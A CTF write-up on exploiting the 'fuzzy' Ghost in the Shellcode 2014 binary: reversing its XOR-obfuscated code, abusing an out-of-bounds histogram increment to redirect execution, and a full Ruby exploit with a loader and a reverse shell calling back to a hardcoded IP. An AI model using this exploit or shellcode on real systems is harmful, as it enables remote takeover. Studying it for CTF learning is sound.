Ghost in the Shellcode: fuzzy (Pwnage 301)

Hey folks,

It’s a little bit late coming, but this is my writeup for the Fuzzy level from the Ghost in the Shellcode 2014 CTF! I kept putting off writing this, to the point where it became hard to just sit down and do it. But I really wanted to finish before PlaidCTF 2014, which is this weekend so here we are! You can see my other two writeups here (TI-1337) and here (gitsmsg).

Like my other writeups, this is a “pwnage” level, and required the user to own a remote server. Unfortunately, because of my slowness, they’re no longer running the server, but you can get a copy of the binary at my github page and run it yourself. It’s a 64-bit Linux ELF executable. It didn’t have ASLR, and DEP would have been

The setup

The service itself was a fairly simple calculator application, the kind you might make in a Computer Science 101 course. For example:

 1 $ nc -vv localhost 4141
 2 localhost [127.0.0.1] 4141 (?) open
 3 Welcome to the super secure parsing engine!
 4 Please select a parser!
 5 
 6 1) Sentence histogram
 7 2) Sorted characters (ascending)
 8 3) Sorted characters (decending)
 9 4) Sorted ints (ascending)
10 5) Sorted ints (decending
11 6) global_find numbers in string
12 2
13 Enter a series of characters to check if it's sorted
14 This is a test string
15 is NOT sorted

Or the histogram function:

 1 $ nc -vv localhost 4141
 2 localhost [127.0.0.1] 4141 (?) open
 3 Welcome to the super secure parsing engine!
 4 Please select a parser!
 5 
 6 1) Sentence histogram
 7 2) Sorted characters (ascending)
 8 3) Sorted characters (decending)
 9 4) Sorted ints (ascending)
10 5) Sorted ints (decending
11 6) global_find numbers in string
12 1
13 Enter a series of characters
14 This is histrogram
15  :2     !:0     ":0     #:0     $:0
16  %:0     &:0     ':0     (:0     ):0
17  *:0     +:0     ,:0     -:0     .:0
18  /:0     0:0     1:0     2:0     3:0
19  4:0     5:0     6:0     7:0     8:0
20  9:0     ::0     ;:0     <:0     =:0
21  >:0     ?:0     @:0     A:0     B:0
22  C:0     D:0     E:0     F:0     G:0
23  H:0     I:0     J:0     K:0     L:0
24  M:0     N:0     O:0     P:0     Q:0
25  R:0     S:0     T:1     U:0     V:0
26  W:0     X:0     Y:0     Z:0     [:0
27  \:0     ]:0     ^:0     _:0     `:0
28  a:1     b:0     c:0     d:0     e:0
29  f:0     g:1     h:2     i:3     j:0
30  k:0     l:0     m:1     n:0     o:1
31  p:0     q:0     r:2     s:3     t:1
32  u:0     v:0     w:0     x:0     y:0
33  z:0     {:0     |:0     }:0

Straight forward!

Code security

The blurb for the application mentioned their unbreakable security wrapper. Sounds interesting, but what’s that even mean? Well, if you open up the code in IDA and poke around a bit, you’ll find that after opening a socket and accepting a connection, it forks and calls handleConnection():

.text:004014C1 handleConnection proc near              ; DATA XREF: main+3Bo
.text:004014C1
.text:004014C1 var_4           = dword ptr -4
.text:004014C1
.text:004014C1                 push    rbp
.text:004014C2                 mov     rbp, rsp
.text:004014C5                 sub     rsp, 10h
.text:004014C9                 mov     [rbp+var_4], edi ; var_4 = socket
.text:004014CC                 mov     eax, 0
.text:004014D1                 call    initFunctions   ; Store pointers to a bunch of functions
.text:004014D6                 mov     eax, [rbp+var_4]
.text:004014D9                 mov     dword ptr cs:global_f+48h, eax
.text:004014DF                 mov     rax, qword ptr cs:global_f+20h ; rax = callFunction
.text:004014E6                 mov     rdx, qword ptr cs:global_f+68h ; rdx = intro
.text:004014ED                 lea     rcx, [rbp+var_4]
.text:004014F1                 mov     rsi, rcx        ; socket
.text:004014F4                 mov     rdi, rdx        ; function
.text:004014F7                 call    rax             ; callFunction
.text:004014F9                 mov     eax, 0
.text:004014FE                 leave
.text:004014FF                 retn

initFunctions() looks like this:

.text:00401627 initFunctions   proc near               ; CODE XREF: handleConnection+10h.text:00401627                 push    rbp
.text:00401628                 mov     rbp, rsp
.text:0040162B                 mov     qword ptr cs:global_f, offset _puts
.text:00401636                 mov     qword ptr cs:global_f+8, offset _getchar
.text:00401641                 mov     qword ptr cs:global_f+10h, offset _send
.text:0040164C                 mov     qword ptr cs:global_f+18h, offset _recv
.text:00401657                 mov     qword ptr cs:global_f+20h, offset callFunction
.text:00401662                 mov     qword ptr cs:global_f+28h, offset _strlen
.text:0040166D                 mov     qword ptr cs:global_f+30h, offset _memset
.text:00401678                 mov     qword ptr cs:global_f+38h, offset _sprintf
.text:00401683                 mov     qword ptr cs:global_f+40h, offset _atoi
.text:0040168E                 mov     qword ptr cs:global_f+50h, offset my_sendAll
.text:00401699                 mov     qword ptr cs:global_f+58h, offset my_readAll
.text:004016A4                 mov     qword ptr cs:global_f+60h, offset my_readUntil
.text:004016AF                 mov     qword ptr cs:global_f+68h, offset intro
...and so on.

Thankfully, there are symbols! There might be one or two that I named, but the rest were all symbols that were embedded into the executable. I actually made a struct in IDA that had all the functions listed with their offsets from global_f, which made it easy to see what was being called later.

The functions themselves pointed to what looks like encrypted/compressed code:

.data:006034E0 isSorted        db 0AAh, 0B7h, 76h, 1Ah, 0B7h, 7Eh, 13h, 8Fh, 0FEh, 2 dup(0FFh)
.data:006034E0                                         ; DATA XREF: initFunctions+9Eo
.data:006034E0                 db 0B7h, 76h, 42h, 67h, 1, 2 dup(0), 9Bh, 0B7h, 74h, 0FBh
.data:006034E0                 db 0DAh, 0D7h, 3 dup(0FFh), 0B7h, 76h, 0BAh, 7, 0CEh, 3Fh
.data:006034E0                 db 0B7h, 74h, 7Ah, 67h, 1, 2 dup(0), 74h, 0BFh, 0B7h, 76h
.data:006034E0                 db 7Ah, 4Fh, 1, 2 dup(0), 0B7h, 74h, 7Ah, 67h, 1, 2 dup(0
...

So, almost every function is obscured in some way. I can work with this!

In the handleConnection() function, the only call after initFunctions() is:

.text:004014DF                 mov     rax, qword ptr cs:global_f+20h ; rax = callFunction
.text:004014E6                 mov     rdx, qword ptr cs:global_f+68h ; rdx = intro
.text:004014ED                 lea     rcx, [rbp+var_4]
.text:004014F1                 mov     rsi, rcx        ; socket
.text:004014F4                 mov     rdi, rdx        ; function
.text:004014F7                 call    rax             ; callFunction

Let’s have a look at callFunction() (I’ll shorten this to just the super important stuff, grab the file from github if you want a complete listing):

.text:004015BB                 mov     edx, 7          ; prot
.text:004015C0                 mov     esi, 514h       ; len
.text:004015CA                 call    _mmap           ; Allocate executable memory
.text:004015DB                 mov     edx, 514h       ; n
.text:004015E0                 mov     rsi, rcx        ; src = the encrypted memory
.text:004015E3                 mov     rdi, rax        ; dest = the allocated memory
.text:004015E6                 call    _memcpy
.text:004015EF                 mov     rdi, rax        ; data = allocated memory
.text:004015F2                 call    decryptFunction
.text:0040160C                 call    rdx             ; the allocated memory
.text:0040161A                 mov     rdi, rax        ; the alocated memory
.text:0040161D                 call    _munmap
.text:00401626                 retn

Basically, allocate 0x514 bytes, copy the encrypted code into it, decrypt it, run it, unmap it.

The last step is to look at decryptFunction() - once again, I’m going to leave out unimportant lines:

.text:0040151A loop_top:                               ; CODE XREF: decryptFunction+90j
.text:00401534                 movzx   edx, byte ptr [rdx] ; edx = current character
.text:00401537                 not     edx             ; edx = current character inverted
.text:00401539                 mov     [rax], dl       ; invert the current character
.text:00401583                 movzx   eax, byte ptr [rax] ; eax -> current byte
.text:00401586                 cmp     al, 0C3h        ; Stop if we reach a 'ret'
.text:00401588                 jnz     short loop_bottom
.text:0040158A                 jmp     short done
.text:0040158C ; ---------------------------------------------------------------------------
.text:0040158C
.text:0040158C loop_bottom:                            ; CODE XREF: decryptFunction+6Ej
.text:0040158C                                         ; decryptFunction+74j ...
.text:0040158C                 add     [rbp+counter], 1
.text:00401590                 jmp     short loop_top
.text:00401592 ; ---------------------------------------------------------------------------
.text:00401592
.text:00401592 done:                                   ; CODE XREF: decryptFunction+8Aj
.text:00401592                 mov     eax, [rbp+counter]
.text:00401595                 add     eax, 1
.text:00401598                 leave
.text:00401599                 retn

Effectively, this inverts every character until it reaches a return (0xc3). Essentially XORing with 0xFF. One thing I don’t show here is that it won’t end until after a sequence of five NOPs are found (the code was a little complicated, and I didn’t want to get lost in the details).

To summarize this section, there is a global table that holds pointers to functions that are encrypted by inverting all bits. The table is initialized in initFunctions(), and the functions are accessed using callFunction(). When callFunction() is called, the function is decrypted into some freshly allocated memory, run, then the memory is freed. So if we can get our own encrypted code into the right place……

Decrypting

To make reversing easier, I wrote a quick ruby script that will decrypt the functions in place:

fuzzy = ""
File.open("fuzzy", "r") do |f|
  fuzzy = f.read(33183)
end

puts(fuzzy.length)

start = fuzzy.index("\xAA\xB7\x76\x1A\xB7\x7C\x13\xDF")
puts("start = %x" % start)

start.upto(start + 0x6041E0 - 0x602160 - 1) do |i|
  fuzzy[i] = (fuzzy[i].ord ^ 0xFF).chr
end

File.open("fuzzy-decrypted", "w") do |f|
  f.write(fuzzy)
end

The output file is fuzzy-decrypted, which you can find on the github repository. fuzzy-decrypted.i64 contains the majority of my comments.

This version of the executable won’t run, of course, because it tries to decrypt the already-decrypted data. The easy way to fix this would be to remove the single call to ‘not’, and everything else would work as expected. I didn’t think of that at the time, however, and NOPed out the entire decryption portion. Here is a diff I generated with objdump + diff, note that the syntax will be slightly different than IDA:

 0040159a <callFunction>:
-  40159a:      55                      push   rbp
-  40159b:      48 89 e5                mov    rbp,rsp
-  40159e:      48 83 ec 20             sub    rsp,0x20
-  4015a2:      48 89 7d e8             mov    QWORD PTR [rbp-0x18],rdi
-  4015a6:      48 89 75 e0             mov    QWORD PTR [rbp-0x20],rsi
+  40159a:      48 89 f8                mov    rax,rdi
+  40159d:      bf e0 47 60 00          mov    edi,0x6047e0
+  4015a2:      ff d0                   call   rax
+  4015a4:      c3                      ret
+  4015a5:      90                      nop
+  4015a6:      48 89 7d e8             mov    QWORD PTR [rbp-0x18],rdi
   4015aa:      41 b9 00 00 00 00       mov    r9d,0x0
   4015b0:      41 b8 ff ff ff ff       mov    r8d,0xffffffff
   4015b6:      b9 22 00 00 00          mov    ecx,0x22

Basically, remove the actual function lead-in, and replace it with a call directly to the function.

The final change I made to the executable was to disable the fork() and alarm() functions, as I discussed in previous posts. In the objdump diff, it looks like this:

   401098:      83 7d f4 ff             cmp    DWORD PTR [rbp-0xc],0xffffffff
   40109c:      75 02                   jne    4010a0 <loop+0x3d>
   40109e:      eb 65                   jmp    401105 <loop+0xa2>
-  4010a0:      e8 fb fc ff ff          call   400da0 <fork@plt>
+  4010a0:      48 31 c0                xor    rax,rax
+  4010a3:      90                      nop
+  4010a4:      90                      nop
   4010a5:      89 45 f8                mov    DWORD PTR [rbp-0x8],eax
   4010a8:      83 7d f8 ff             cmp    DWORD PTR [rbp-0x8],0xffffffff
   4010ac:      75 02                   jne    4010b0 <loop+0x4d>
@@ -1220,7 +1222,11 @@
   4010b0:      83 7d f8 00             cmp    DWORD PTR [rbp-0x8],0x0
   4010b4:      75 45                   jne    4010fb <loop+0x98>
   4010b6:      bf 1e 00 00 00          mov    edi,0x1e
-  4010bb:      e8 b0 fb ff ff          call   400c70 <alarm@plt>
+  4010bb:      90                      nop
+  4010bc:      90                      nop
+  4010bd:      90                      nop
+  4010be:      90                      nop
+  4010bf:      90                      nop
   4010c0:      48 8b 05 89 10 20 00    mov    rax,QWORD PTR [rip+0x201089]        # 602150 <USER>
   4010c7:      48 89 c7                mov    rdi,rax
   4010ca:      e8 43 00 00 00          call   401112 <drop_privs_user>
@@ -1584,11 +1590,12 @@
   401599:      c3                      ret

The file, with everything decrypted, can be found under fuzzy-decrypted-fixed on github.

The vulnerability

In spite of the name - fuzzy - implying that I should probably fuzz, I decided that now that I had the code decrypted I would just look for the vuln manually. I’m also a contrarian, which these days people are calling “first world anarchists”. You can’t tell ME what to do! :)

Anyway, I decided to reverse the 6 different parsers in a completely random and arbitrary order, based on what looked easiest to understand. As a reminder, here are the possible parsers:

1) Sentence histogram 2) Sorted characters (ascending) 3) Sorted characters (decending) 4) Sorted ints (ascending) 5) Sorted ints (decending 6) global_find numbers in string

I won’t go into details of the ones that weren’t vulnerable; instead, we’ll look at the first one - Sentence Histrogram. Sentence Histogram calls charHistogram(), which is a rather long function. Essentially, it creates an array of bytes, with one array entry per letter, then loops through the screen and increments the appropriate letter. Something like:

char str[0x80];
for(i = 0; i < strlen(input); i++) {
  str[input[i]]++;
}

Here’s the actual code, abridged:

.data:006031DD                 movzx   eax, byte ptr [rax] ; eax = current_character
.data:006031E0                 movzx   eax, al
.data:006031E3                 movsxd  rdx, eax
.data:006031E6                 movzx   edx, [rbp+rdx+buffer_88_bytes] ; edx = buffer_88_bytes[current_character]
.data:006031EE                 add     edx, 1          ; Increment that index in the 88-byte buffer
.data:006031F1                 cdqe
.data:006031F3                 mov     [rbp+rax+buffer_88_bytes], dl ; <--- VULN
.data:006031FA                 add     [rbp+counter], 1

Due to a lack of input validation, if your string contains bytes with a value of at least 0x88 (‘\x88’), you can increment not only values in the actual array, but values stored up to 0xFF bytes from the start of the array. Oops! Since the array happens to be on the stack, we can control the entire stack frame, to an extent (unfortunately, we only get a couple hundred characters, so we can’t, for example, change all bytes of a 64-bit pointer in a meaningful way).

Madness lies here

It’s been a couple months since I did this, and details for the next few hours of work are fuzzy. I spent a lot of time - probably in the realm of 8 hours or more - trying to figure out what to increment before I noticed this code at the end of charHistrogram():

charHistrogram():006034BE locret_6034BE:                          ; CODE XREF: charHistogram+357j
.data:006034BE                 leave
.data:006034BF                 retn

I was in the habit of ignoring ‘leave’, and didn’t really think about it. D’oh! The ‘leave’ instruction pops rbp off the stack (which we control!), then ‘ret’, of course, returns to the address on the stack (which we also control). Aha!

For an attack, we can modify both the frame pointer - changing how we address local variables - and the return address. Let’s see how!

The attack

As I mentioned, I wanted to change the return address. Specifically, I wanted to change it from 0x40160E (the normal return address) to 0x4015AA. The reason I want it to be 0x4015AA is because at that address, this code is found:

.text:004015AA                 mov     r9d, 0          ; offset
.text:004015B0                 mov     r8d, 0FFFFFFFFh ; fd
.text:004015B6                 mov     ecx, 22h        ; flags
.text:004015BB                 mov     edx, 7          ; prot
.text:004015C0                 mov     esi, 514h       ; len
.text:004015C5                 mov     edi, 0          ; addr
.text:004015CA                 call    _mmap
.text:004015CF                 mov     [rbp+addr], rax
.text:004015D3                 mov     rcx, [rbp+src]
.text:004015D7                 mov     rax, [rbp+addr]
.text:004015DB                 mov     edx, 514h       ; n
.text:004015E0                 mov     rsi, rcx        ; src
.text:004015E3                 mov     rdi, rax        ; dest
.text:004015E6                 call    _memcpy
.text:004015EB                 mov     rax, [rbp+addr]
.text:004015EF                 mov     rdi, rax
.text:004015F2                 call    decryptFunction
.text:004015F7                 mov     rdx, [rbp+addr]
.text:004015FB                 mov     rax, [rbp+var_20]
.text:004015FF                 mov     rsi, rax
.text:00401602                 mov     edi, offset global_f
.text:00401607                 mov     eax, 0
.text:0040160C                 call    rdx

Which allocates memory, copies code into it (relative to rbp, the frame pointer, which I eventually realized that we control!), decrypts it, and runs it. If we can change the return address to that line, and change rbp just enough that [rbp+src] points to memory we control, we’re home free!

Now, to change 0x40160E (the normal return address) to 0x4015AA (the address I want), I had to increment the last byte 0xCA (0xAA - 0xE0) times, and increment the second-last byte once (0x16 - 0x15). I wrote a function called edit_memory() that would essentially do the math for you and increment the proper bytes:

 67 def edit_memory(from, to, location)
 68   # Handle each of the 8 bytes, though in practice I think we only needed
 69   # the first two
 70   0.upto(7) do |i|
 71     # Get the before and after values for the current byte
 72     from_i = (from >> (8 * i)) & 0xFF
 73     to_i   = (to   >> (8 * i)) & 0xFF
 74 
 75     # As long as the bytes are different, add the current 'increment' character
 76     while(from_i != to_i) do
 77       # If we already have the location from the shellcode or something, don't
 78       # repeat it
 79       if(!@@used_chars[location+i].nil? && @@used_chars[location+i] > 0)
 80         $stderr.puts("Saved a character!")
 81         @@used_chars[location+i] -= 1
 82       else
 83         my_print((location+i).chr)
 84       end
 85 
 86       # Increment as a byte
 87       from_i = (from_i + 1) & 0xFF
 88     end
 89   end
 90 end

One unfortunate issue that I ran into is that the frame pointer - rbp - is slightly different on my test system and the eventual production system. I ended up writing a small brute forcer that would attempt to run the shellcode “\xeb\xfe” over and over, with slightly different rbp addresses, until it finally stopped responding, telling me that the infinite loop was successful. That was ugly, but it worked well in the end!

Shellcode

That all sounds pretty straight forward, but there was a catch: I decided to point [rbp+src] to the beginning of the character array that’s fed into the histogram. That may sound good, since I control that memory in full, but the catch is that any character > 0x88 has a chance of modifying an important stack address, which means all shellcode I could find would simply corrupt the stack and crash. D’oh! It also had to be encoded, since the code is decoded (XORed with 0xFF) before being run, but that’s easy.

I spent a lot of time writing code that would basically read a file off the remote filesystem. After a couple hours of carefully crafting shellcode, I finally got it working and realized that the filename wasn’t the same filename used in the previous two levels. I had no idea which file to read! As a result, I had to write full on exec bind-shell shellcode.

After another couple hours trying to get exec to work without crashing, I gave up that approach, and decided to write a loader instead. A loader can be shorter and simpler, but can run any arbitrary code.

Three custom shellcode later, considering I had never, up to this point, written 64-bit assembly code, I had both working shellcode and a fairly good understanding of 64-bit shellcoding! :)

Here’s what I ended up coming up with:

# Encode the custom-written loader code that basically reads from the
# socket into some allocated memory, then runs it.
#
# Trivia: This is my first 64-bit shellcode! :)
#
# This had to be carefully constructed because it would influence the
# eventual histogram, which would modify the stack and therefore break
# everything.
my_print(encode_shellcode(

  "\xb8\x09\x00\x00\x00"     + # mov eax, 0x00000006 (mmap)
  "\xbf\x00\x00\x00\x41"     + # mov edi, 0x41000000 (addr)
  "\xbe\x00\x10\x00\x00"     + # mov esi, 0x1000 (size)
  "\xba\x07\x00\x00\x00"     + # mov rdx, 7 (prot)
  "\x41\xba\x32\x00\x00\x00" + # mov r10, 0x32 (flags)
  "\x41\xb8\x00\x00\x00\x00" + # mov r8, 0
  "\x41\xb9\x00\x00\x00\x00" + # mov r9, 0
  "\x0f\x05"                 + # syscall - mmap

  "\xbf\x98\xf8\xd0\xb0"     + # mov edi, ptr to socket ^ 0xb0b0b0b0
  "\x81\xf7\xb0\xb0\xb0\xb0" + # xor edi, 0xb0b0b0b0
  "\x48\x8b\x3f"             + # mov edi, [edi]

  "\xb8\x00\x00\x00\x00"     + # mov rax, 0
  "\xbe\x00\x00\x00\x41"     + # mov esi, 0x41000000
  "\xba\x00\x20\x00\x00"     + # mov edx, 0x2000
  "\x0f\x05"                 + # syscall - read
  "\x56\xc3"                 + # push esi / ret
  "\xc3"                     + # ret

  "\xcd\x03" # int 3
))

Basically, this calls mmap() to allocate a bunch of memory, reads the actual socket descriptor from a global varibale, reads data from the socket into the memory, then jumps to the start of it. Now I can use a bind-shell I found online without worrying about input restrictions!

The exploit

I don’t think I chose the best possible way to attack this vulnerability. As I mentioned before, it required a small amount of bruteforcing to get offsets on the production server, which isn’t the cleanest. Here’s the exploit, in full, with comments. I’ve already explained the interesting bits:

  1 # The base address of the array that overwrites code
  2 # (Note: this can change based on the length that we sent! The rest doesn't appear to)
  3 BASE_VULN_ARRAY = 0x7fffffffdf80-0x90
  4 
  5 # The real target and my local target have different desired FP values
  6 IS_REAL_TARGET = 1
  7 
  8 # We want to edit the return address
  9 RETURN_ADDR         = 0x7fffffffdf88  # Where the value we want to edit is
 10 RETURN_OFFSET       = RETURN_ADDR - BASE_VULN_ARRAY
 11 REAL_RETURN_ADDR    = 0x40160E
 12 DESIRED_RETURN_ADDR = 0x4015AA
 13 
 14 # And also edit the frame pointer
 15 FP_ADDR         = 0x7fffffffdf80
 16 FP_OFFSET       = FP_ADDR - BASE_VULN_ARRAY
 17 REAL_FP         = 0x00007fffffffdfb0
 18 DESIRED_FP      = 0x00007fffffffdfe8 + (7 * 8 * IS_REAL_TARGET)
 19 
 20 # This global tracks which characters we use in our shellcode, to avoid
 21 # influence the histogram values for the important offsets
 22 @@used_chars = []
 23 
 24 # Keep track of how many bytes were printed, so we can print padding after
 25 # (and avoid changing the size of the stack)
 26 #
 27 # I added this because I noticed addresses on the stack shifting relative
 28 # to each other, a bit, though that may have been sleep-deprived daftness
 29 @@n = 0
 30 def my_print(str)
 31   print(str)
 32   @@n += str.length
 33 end
 34 
 35 # Code is 'encrypted' with a simple xor operation
 36 def encode_shellcode(code)
 37   buf = ""
 38 
 39   0.upto(code.length-1) do |i|
 40     c = code[i].ord ^ 0xFF;
 41 
 42     # If encoded shellcode contains a newline, it won't work, so catch it early
 43     if(c == 0x0a)
 44       $stderr.puts("Shellcode has a newline! :(")
 45       exit
 46     end
 47 
 48     # Increment the histogram for this character
 49     @@used_chars[c] = @@used_chars[c].nil? ? 1 : @@used_chars[c] + 1
 50 
 51     # Append it to the buffer
 52     buf += c.chr
 53   end
 54 
 55   return buf
 56 end
 57 
 58 # This will edit any memory address up to 32 bytes away on the stack. I
 59 # wrote it because I got sick of doing this manually.
 60 #
 61 # Basically, it looks at two variables - the 'from' is the original, known
 62 # value, and 'to' is value we want it to be. It modifies each of the
 63 # variables one byte at a time, by incrementing the byte.
 64 #
 65 # Each byte increment is one character in the output, so the more different
 66 # the values are, the bigger the output gets (eventually getting too big)
 67 def edit_memory(from, to, location)
 68   # Handle each of the 8 bytes, though in practice I think we only needed
 69   # the first two
 70   0.upto(7) do |i|
 71     # Get the before and after values for the current byte
 72     from_i = (from >> (8 * i)) & 0xFF
 73     to_i   = (to   >> (8 * i)) & 0xFF
 74 
 75     # As long as the bytes are different, add the current 'increment' character
 76     while(from_i != to_i) do
 77       # If we already have the location from the shellcode or something, don't
 78       # repeat it
 79       if(!@@used_chars[location+i].nil? && @@used_chars[location+i] > 0)
 80         $stderr.puts("Saved a character!")
 81         @@used_chars[location+i] -= 1
 82       else
 83         my_print((location+i).chr)
 84       end
 85 
 86       # Increment as a byte
 87       from_i = (from_i + 1) & 0xFF
 88     end
 89   end
 90 end
 91 
 92 # Choose 'histogram'
 93 puts("1")
 94 
 95 # The first part gets eaten, I'm not sure why
 96 my_print(encode_shellcode("\x90" * 20))
 97 
 98 # Encode the custom-written loader code that basically reads from the
 99 # socket into some allocated memory, then runs it.
100 #
101 # Trivia: This is my first 64-bit shellcode! :)
102 #
103 # This had to be carefully constructed because it would influence the
104 # eventual histogram, which would modify the stack and therefore break
105 # everything.
106 my_print(encode_shellcode(
107 
108   "\xb8\x09\x00\x00\x00"     + # mov eax, 0x00000006 (mmap)
109   "\xbf\x00\x00\x00\x41"     + # mov edi, 0x41000000 (addr)
110   "\xbe\x00\x10\x00\x00"     + # mov esi, 0x1000 (size)
111   "\xba\x07\x00\x00\x00"     + # mov rdx, 7 (prot)
112   "\x41\xba\x32\x00\x00\x00" + # mov r10, 0x32 (flags)
113   "\x41\xb8\x00\x00\x00\x00" + # mov r8, 0
114   "\x41\xb9\x00\x00\x00\x00" + # mov r9, 0
115   "\x0f\x05"                 + # syscall - mmap
116 
117   "\xbf\x98\xf8\xd0\xb0"     + # mov edi, ptr to socket ^ 0xb0b0b0b0
118   "\x81\xf7\xb0\xb0\xb0\xb0" + # xor edi, 0xb0b0b0b0
119   "\x48\x8b\x3f"             + # mov edi, [edi]
120 
121   "\xb8\x00\x00\x00\x00"     + # mov rax, 0
122   "\xbe\x00\x00\x00\x41"     + # mov esi, 0x41000000
123   "\xba\x00\x20\x00\x00"     + # mov edx, 0x2000
124   "\x0f\x05"                 + # syscall - read
125   "\x56\xc3"                 + # push esi / ret
126   "\xc3"                     + # ret
127 
128   "\xcd\x03" # int 3
129 ))
130 
131 # The 'decryption' function requires some NOPs (I think 6) followed by a return
132 # to identify the end of an encrypted function
133 my_print(encode_shellcode(("\x90" * 10) + "\xc3"))
134 
135 ## Increment the return address
136 edit_memory(REAL_RETURN_ADDR, DESIRED_RETURN_ADDR, RETURN_OFFSET)
137 edit_memory(REAL_FP, DESIRED_FP, FP_OFFSET)
138 
139 # Pad up to exactly 0x300 bytes
140 while(@@n < 0x300)
141   my_print(encode_shellcode("\x90"))
142   @@n += 1
143 end
144 
145 # Add the final newline, which triggers the overwrites and stuff
146 puts()
147 
148 # This is standard shellcode I found online and modified a tiny bit
149 #
150 # It's what's read by the 'loader'.
151 SCPORT = "\x41\x41" # 16705 */
152 SCIPADDR = "\xce\xdc\xc4\x3b" # 206.220.196.59 */
153 puts("" +
154   "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +
155   "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +
156   "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" +
157   "\x02"+SCPORT+"\xc7\x44\x24\x04"+SCIPADDR+"\x48\x89\xe6\x6a\x10" +
158   "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" +
159   "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +
160   "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +
161   "\x5f\x6a\x3b\x58\x0f\x05\0\0\0\0")
162

Conclusion

So, that’s my months-late writeup of fuzzy! I think I captured most of the details accurately. One thing I haven’t mentioned is that I ended up finishing it at about 6:30am, a solid 12 hours of working after I started! It certainly shouldn’t have been that difficult, but I took some long wrong turns. :)